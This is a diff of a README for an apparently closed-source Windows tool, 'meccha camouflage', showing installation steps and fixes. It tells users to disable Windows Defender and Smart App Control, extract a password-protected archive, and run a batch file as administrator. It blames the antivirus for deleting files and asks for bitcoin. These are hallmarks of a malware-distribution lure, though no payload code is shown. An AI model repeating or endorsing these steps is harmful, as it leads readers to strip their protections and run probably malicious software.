MecchaElov/meccha-camouflage-V1.7.2/README.md

  - 2 before download you will need to turn off smart app control and windows Defender..
 (if you are not sure about this it is beacuse windows defender takes closed source as a "virus" and smart app control wont let you open closed source projects if they do not have a verified realeser)

- - 3 download "meccha camouflage V1.7.2" then create a folder on your desktop and call it whatever you want now open "meccha camouflage V1.7.2" and take the files out from the winrar into your folder..
+ - 3 download "meccha camouflage V2.1" then create a folder on your desktop and call it whatever you want now put the files from the winrar into your new folder..
-(password is "Meccha Cmoufalge")
+(password is "meccha camouflage")

- - 4 open "Meccha Cmoufalge.exe" if it does not open try open it with admin as that should fix any issues..
+ - 4 open "simple setup.bat" as admin if not it wont open (only way i could fix this)..

 and done

 # Fixes:
 (common issues with fixes)

-- "wont open at all" try to install NET run10
+- "wont open at all" try to install NET run10 < - this should be fixed but if not then do this
-- "crash after loading" open the menu before opening Meccha
 - "load.error" you didnt turn off your antivirus and have to reinstall the whole project since it has deleted files

-# Thanks For Using Meccha Cmoufalge
+# Thanks For Using meccha camouflage

 buy me a coffie
 btc: 1Q2TWHE3GMdB6BZKafqwxXtWAWgFt5Jvm3

-(so sorry for the massive erros we have fixed everthing now)